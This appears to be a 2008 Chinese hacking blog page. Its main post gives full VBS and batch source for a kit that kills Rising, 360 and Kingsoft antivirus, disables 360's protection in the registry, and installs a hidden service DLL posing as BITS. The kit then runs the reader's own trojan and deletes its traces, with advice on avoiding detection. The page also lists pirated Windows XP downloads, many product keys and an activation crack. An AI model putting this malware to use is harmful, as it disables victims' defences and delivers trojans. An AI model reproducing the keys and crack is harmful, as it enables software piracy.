Nero 7 注册机
[ 2008/08/19 10:33 | by selboo ]
驱动防火墙 Ver 3.1
[ 2008/08/18 16:24 | by selboo ]
转自 http://www.wolfexp.net/forum/viewthread.php?tid=6714&extra=page%3D1
由网维的驱动防火墙思路而做.加入多种方式拦截功能,加入拦截网马功能,经测试可拦截市面上所有网马,与还原系统配合,很爽.....
比1.0新增了一些敏感函数,如果没有发现新的加载驱动的方法,很可能是最后一个版本
经本人测试2000,xp,2003下均能稳定的运行,也是偶学驱动这段时间的一个小作品吧,算是实质性的东西,牛们不要笑我.
附上拦截网马和驱动的图
2008/08/15 04:28 更正优化了部分代码,更加稳定
2008/08/16 16:28 加入用户模式,后台模式两种启动方式,后台模式程序后跟参数"noquit"启动,后台模式禁止关闭,禁止更改配置
2008/08/16 23:18 更正旧服务端没删除干净引起的BUG
2008/08/18 00:04 加入对一些敏感函数的监视
2008/08/18 15:21 加强对自身的防护
可以干掉瑞星,金山,nod32,360的小东西
[ 2008/08/17 17:14 | by selboo ]
这里有到了两个bat和两个vbs+一个kill.exe
下面是源码:
setdt.vbs的源码:
set Cleaner=createobject("wscript.shell")
Cleaner.run "setdt.bat",vbhide
Cleaner.run "setdt.bat",vbhide
setdt.bat的源码:
@ECHO OFF
@date /t>C:\time.txt
date 1988-09-18
hide.vbs
@date <C:\time.txt
del %SystemRoot%\system32\setdt.vbs
del %SystemRoot%\system32\hide.vbs
del %SystemRoot%\system32\command.exe
del %SystemRoot%\system32\xKill.exe
del %SystemRoot%\system32\xkill.bat
del C:\time.txt
del %0
@date /t>C:\time.txt
date 1988-09-18
hide.vbs
@date <C:\time.txt
del %SystemRoot%\system32\setdt.vbs
del %SystemRoot%\system32\hide.vbs
del %SystemRoot%\system32\command.exe
del %SystemRoot%\system32\xKill.exe
del %SystemRoot%\system32\xkill.bat
del C:\time.txt
del %0
hide.vbs的源码:
dim shell
set shell=CreateObject("Wscript.Shell")
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
set Cleaner=createobject("wscript.shell")
Cleaner.run "xkill.bat",vbhide
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
set shell=CreateObject("Wscript.Shell")
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\xKill.exe",0
set Cleaner=createobject("wscript.shell")
Cleaner.run "xkill.bat",vbhide
WScript.Sleep 100000
shell.run "cmd /c start %SystemRoot%\system32\command.exe",0
xkill.bat的源码:
@echo off
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo 72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0
taskkill /f /im rstray.exe >NUL
taskkill /f /im 360tray.exe >NUL
taskkill /f /im 360safe.exe >NUL
echo Windows Registry Editor Version 5.00>>kill.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\safemon]>>kill.reg
echo "MonAccess"=dword:00000000>>kill.reg
echo "SiteAccess"=dword:00000000>>kill.reg
echo "ExecAccess"=dword:00000000>>kill.reg
echo "UDiskAccess"=dword:00000000>>kill.reg
echo "LeakShowed"=dword:00000000>>kill.reg
sc create DARK binpath= %windir%\System32\darkkill.dll
sc config DARK start= disabled
echo Windows Registry Editor Version 5.00>>dark.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK]>>dark.reg
echo "Type"=dword:00000110>>dark.reg
echo "Start"=dword:00000002>>dark.reg
echo "ErrorControl"=dword:00000001>>dark.reg
echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>dark.reg
echo 74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\>>dark.reg
echo 00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\>>dark.reg
echo 6b,00,20,00,6e,00,65,00,74,00,73,00,76,00,63,00,73,00,00,00>>dark.reg
echo "DisplayName"="Background Intelligent Transfer Service">>dark.reg
echo "DependOnService"=hex(7):52,00,70,00,63,00,53,00,73,00,00,00,00,00>>dark.reg
echo "DependOnGroup"=hex(7):00,00>>dark.reg
echo "ObjectName"="LocalSystem">>dark.reg
echo "Description"=hex(2):00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Parameters]>>dark.reg
echo "ServiceDll"=hex(2):43,00,3a,00,5c,00,57,00,49,00,4e,00,44,00,4f,00,57,00,53,\>>dark.reg
echo 00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,00,61,00,\>>dark.reg
echo 72,00,6b,00,6b,00,69,00,6c,00,6c,00,2e,00,64,00,6c,00,6c,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Security]>>dark.reg
echo "Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,\>>dark.reg
echo 00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\>>dark.reg
echo 00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,\>>dark.reg
echo 05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\>>dark.reg
echo 20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,\>>dark.reg
echo 00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,\>>dark.reg
echo 00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00>>dark.reg
echo
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DARK\Enum]>>dark.reg
echo "0"="Root\\LEGACY_DARK\\0000">>dark.reg
echo "Count"=dword:00000001>>dark.reg
echo "NextInstance"=dword:00000001>>dark.reg
regedit /s dark.reg
regedit /s kill.reg
COPY dark.dll %windir%\System32\darkkill.dll
sc config DARK start= AUTO
net start DARK
attrib %windir%\System32\darkkill.dll +s +h
del kill.reg
del dark.reg
del dark.dll
del dark.exe
xkill.exe
taskkill /f /im kav.exe >NUL
del %0
xkill.exe
下载文件 (已下载 154 次)大家不要把xkill.exe上传到杀毒网上试试,曾经有一份真挚的免杀马摆在我的面前,我没有去珍惜.把它上传到杀毒网上www.virustotal.com,结果........
这个小工具请解压后,将你的马复制到解压目录,并重命名为command.exe,然后用winrar打包生成自解压文件,选择解压后运行setdt.vbs
Copyright(C) 1999-2008 搁氵,━═戋 All Rights Reserved BloG: http://hi.baidu.com/hackerfield
红狼远控安全小组: http://www.wolfexp.net/
工具md5值: 9566b78aa412970b148f90baa137e7de
BAT下载者代码生成器
[ 2008/08/16 18:22 | by selboo ]
Windows XP零售版,下载地址,激活方法
[ 2008/08/12 12:12 | by selboo ]
一、Windows XP SP2 简体中文零售版
卷标:VRMPFPP_CN
文件大小:600M
md5值:a1ba6a76c995c453c5b12ec5c1ab4a67
SHA1:92934976213bb9201057281a200f84127be0050d
ISO/CRC:FFFFFFFF
据一些论坛的朋友称此版比大客户版VOL要稳定些,是需要激活的纯净的安装版!是否属实,本人正在测试。欢迎各位朋友交流、探讨。
下载地址:我的纳米网络硬盘 (注:此方法是最快的,但需要安装纳米机器人)
安装序列号:BX6HT-MDJKW-H2J4X-BX67W-TVVFG(安装前请记下,不能用vol版的序列号)。安装后需要手动激活,激活文件见附件。
再提供一个下载地址:ed2k://|file|VRMPFPP_CN.iso|6213 ... 6CW4SNKVYICXWQV|/tN (此地址下载速度很慢)
此版安装完有很多补丁需要自己打上,可以用雨林的补丁集,很快的一会就打完所有的补丁。下载请点击:最新补丁全集
二、Windows XP SP3 简体中文零售版
发布日期:(UTC):5/1/2008 11:01:59 PM
SHA1:69dbf131116760932dcf132ade111d6b45778098
MD5:534314ec312e8407cfdc6ef1ff21b804
ISO/CRC:FFFFFFFF
1、迅雷直接点击下载:Windows XP SP3 简体中文零售版(很慢)
2、网络硬盘下载(需安装RaySource软件)
下载地址:http://www.fs2you.com/en/files/b9905975-18e9-11dd-8b8b-0014221b798a/
安装序列号:
FVYD-GDP9X-GGY8T-9PQ8Y-6273D
VRKYC-RXK3B-H7HW2-B3J9D-TMQGD
R9BCP-VF23P-BB6YM-JPYGQ-CT48Y
HM936-QBMRV-Y2QKP-FV4BG-XX38Y
PWFT4-24BFM-YFX6T-QJJ48-Q9968
XKTQX-9J7YK-HRHCM-CW6HW-XV9V6
F6DXK-4YM2R-TJKM2-KHRGY-C7DCW
B9QXV-QCHR4-CVGR3-4DDKQ-KK7VQ
QCMGX-P44QJ-872MM-T82M3-4VWDW
TB4JQ-PMG2C-32C9J-4FX3P-9FDTG
BD9HC-83KR8-DMT9M-69RPQ-CW9FM
Q3GHH-PBFB8-GGMWT-KXBPM-HWQVQ
WD6GB-Y6X67-RKPGJ-W2RH2-WFD7Q
QDTMY-HT7JG-XMTT8-R9K9H-26Y2B
TBKF7-8PCDP-72487-7MV4W-7KTV3
HFYQM-3QBBB-WG3QG-XW9HH-7GTMQ
H7W7J-J8DKC-2WMF8-9JCRQ-BK6VT
HG9P2-FRQYD-66FVJ-MTPVQ-QCVW3
QYP7J-WQ76Q-R2J8K-2VCPP-VPD88
BHX24-8486D-2W99H-VQCXJ-Y6B3M
Q48G9-YCJ78-X4QT8-TYXJ2-YDXD8
C3BC9-TT4YX-3BMVK-XP7H8-G3QXW
RKR78-X3QXT-R39X9-69PJ6-KDGT8
WG7J4-KWJP7-WDBKG-X7QG4-FRYBM
HG24K-JX984-QFQ4X-BR2XM-2C4H3
H6QTC-6YHK2-HX7YT-VD4HP-BBTWJ
HWT63-P9QBW-XQD88-4CHY9-3BTDM
QFJYQ-MT473-K4W7Y-W4KJB-9D2X8
三、激活方法
以上两个版本我已下载测试,是正宗的原版,追求完美的朋友可以下载一试。安装后需要手动激活,不过我介绍一款自动激活工具,可以一次完成激活与破解。
下载xpoem激活工具,下载地址:http://www.fs2you.com/zh-cn/files/911cca85-4762-11dd-88f6-00142218fc6e/
下载后重新启动电脑进入安全模式,解压打开XPOEM免激活程序并运行,重启,系统已成为oem版,并已激活!进入微软正版验证地址,可以顺利通过!
说明:安装SP3零售版时可以先不输入序列号,进入系统后有激活提示,不要管他,用工具在安全模式下直接激活就可以去掉
这种方法照样适用vol版,vol版也有key被封的可能,但oem就不太可能的。B软件只是把系统中的几个文件替换成了oem的,对系统没有影响,请放心使用!
